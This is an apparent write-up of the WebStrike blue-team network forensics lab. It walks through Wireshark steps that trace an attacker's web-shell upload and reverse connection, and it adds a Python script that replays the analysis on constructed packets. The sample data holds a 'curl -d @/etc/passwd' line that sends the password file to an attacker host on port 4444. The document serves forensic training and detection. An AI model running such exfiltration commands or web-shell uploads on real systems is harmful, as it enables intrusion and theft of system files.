
WebStrike Blue Team Lab
Network Forensics lab
1- First, to identify the attacker, I checked the Conversations tab in Wireshark; after getting the IP, I looked it up on the ipgeolocation website to find the city.



2- Since the scenario says the attacker used a script, I added the attacker IP as a filter and searched for "admin", the most common word used in the script, then analyzed the request to find the User-Agent.




3- To find the script name, I checked the Requests tab; it's easy, by the way.


4- To find the directory, I used a filter on the destination port and the GET request method.


5- Let's find the port: I reversed the filter to use Source instead of Destination, in order to know which port communicated with this script.

6- To identify which file the attacker tried to exfiltrate, I followed the TCP stream and increased the stream number until I reached the file, which is passwd. This is a serious attacker, by the way (:
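The same six steps can be scripted so they are repeatable across captures. The block below is an added example, not part of the original writeup or the lab, and it works on constructed packet records (source IP/port, destination IP/port, payload) instead of a real PCAP; in practice you would extract those fields with tshark or scapy. All IPs, ports, the script name `webshell-placeholder.php` and the User-Agent string are placeholders I made up, not the lab's answers, and the geolocation lookup of step 1 is left out because it needs an external service.

```python
"""Scripted equivalent of the Wireshark steps in the writeup (added example, constructed data)."""
import posixpath
import re
from collections import Counter

# Constructed capture: (src_ip, src_port, dst_ip, dst_port, payload). Placeholder values only.
PACKETS = [
    ("10.0.0.5", 51000, "192.168.1.10", 80,
     "GET / HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: curl/8.0\r\n\r\n"),
    ("203.0.113.7", 40001, "192.168.1.10", 80,
     "GET /admin/login.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: AttackerScanner/1.0\r\n\r\n"),
    ("203.0.113.7", 40002, "192.168.1.10", 80,
     "POST /upload.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: AttackerScanner/1.0\r\n"
     "Content-Type: multipart/form-data; boundary=X\r\n\r\n--X\r\n"
     'Content-Disposition: form-data; name="file"; filename="webshell-placeholder.php"\r\n\r\n'
     "<?php ... ?>\r\n--X--\r\n"),
    ("203.0.113.7", 40003, "192.168.1.10", 80,
     "GET /uploads/webshell-placeholder.php HTTP/1.1\r\nHost: shop.example\r\n"
     "User-Agent: AttackerScanner/1.0\r\n\r\n"),
    # Victim connects back to the attacker: this is what the reversed (source) filter reveals.
    ("192.168.1.10", 45678, "203.0.113.7", 4444, "id\n"),
    ("203.0.113.7", 4444, "192.168.1.10", 45678, "uid=33(www-data) gid=33(www-data)\n"),
    ("192.168.1.10", 45678, "203.0.113.7", 4444, "curl -d @/etc/passwd http://203.0.113.7:4444/\n"),
]

REQUEST_LINE = re.compile(r"^(GET|POST|PUT|HEAD|DELETE)\s+(\S+)\s+HTTP/1\.[01]\r\n")
FILENAME_RE = re.compile(r'filename="([^"]+)"')


def conversations(packets):
    """Step 1, Conversations tab: packet count per unordered IP pair."""
    counts = Counter()
    for src, _, dst, _, _ in packets:
        counts[tuple(sorted((src, dst)))] += 1
    return counts


def suspected_attacker(packets, internal_prefix="192.168."):
    """Step 1: the external peer with the most traffic, i.e. the top row of the Conversations tab."""
    external = Counter()
    for pair, n in conversations(packets).items():
        for ip in pair:
            if not ip.startswith(internal_prefix):
                external[ip] += n
    return external.most_common(1)[0][0]


def http_requests(packets, src_ip):
    """Yield (method, path, dst_port, headers, body) for HTTP requests sent by src_ip (ip.src filter)."""
    for src, _, _, dport, payload in packets:
        m = REQUEST_LINE.match(payload) if src == src_ip else None
        if not m:
            continue
        head, _, body = payload.partition("\r\n\r\n")
        headers = {}
        for line in head.split("\r\n")[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        yield m.group(1), m.group(2), dport, headers, body


def attacker_user_agent(packets, attacker_ip, keyword="admin"):
    """Step 2: User-Agent of the attacker's first request whose path contains the keyword."""
    for _, path, _, headers, _ in http_requests(packets, attacker_ip):
        if keyword in path:
            return headers.get("user-agent")
    return None


def uploaded_script(packets, attacker_ip):
    """Step 3: file name carried in the attacker's multipart POST (what the Requests tab shows)."""
    for method, _, _, _, body in http_requests(packets, attacker_ip):
        if method == "POST" and (m := FILENAME_RE.search(body)):
            return m.group(1)
    return None


def script_directory(packets, attacker_ip, script, dport=80):
    """Step 4: GET requests to the destination port that fetch the uploaded script; return its directory."""
    for method, path, dp, _, _ in http_requests(packets, attacker_ip):
        if method == "GET" and dp == dport and path.endswith(script):
            return posixpath.dirname(path) + "/"
    return None


def callback_ports(packets, attacker_ip):
    """Step 5: flip the filter to ip.dst == attacker; ports the victim opened towards the attacker."""
    return sorted({dp for _, _, dst, dp, _ in packets if dst == attacker_ip})


def follow_stream(packets, a_ip, a_port, b_ip, b_port):
    """Step 6, Follow TCP Stream: concatenate both directions of one connection in capture order."""
    ends = {(a_ip, a_port), (b_ip, b_port)}
    return "".join(p for s, sp, d, dp, p in packets if {(s, sp), (d, dp)} == ends)


def exfiltrated_file(stream):
    """Step 6: first /etc/... path referenced in the followed stream."""
    m = re.search(r"(/etc/[\w.-]+)", stream)
    return m.group(1) if m else None


if __name__ == "__main__":
    attacker = suspected_attacker(PACKETS)
    script = uploaded_script(PACKETS, attacker)
    ports = callback_ports(PACKETS, attacker)
    print("attacker:", attacker, "| user-agent:", attacker_user_agent(PACKETS, attacker))
    print("script:", script, "| directory:", script_directory(PACKETS, attacker, script))
    print("callback ports:", ports)
    print("exfiltrated:", exfiltrated_file(follow_stream(PACKETS, "192.168.1.10", 45678, attacker, ports[0])))
```

Each function maps to one manual step, so a reviewer can check which Wireshark view it replaces; the inbound connection in step 5 is the detection signal worth alerting on in a real environment, since a web server opening outbound connections to an untrusted address right after a file upload is rarely legitimate.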

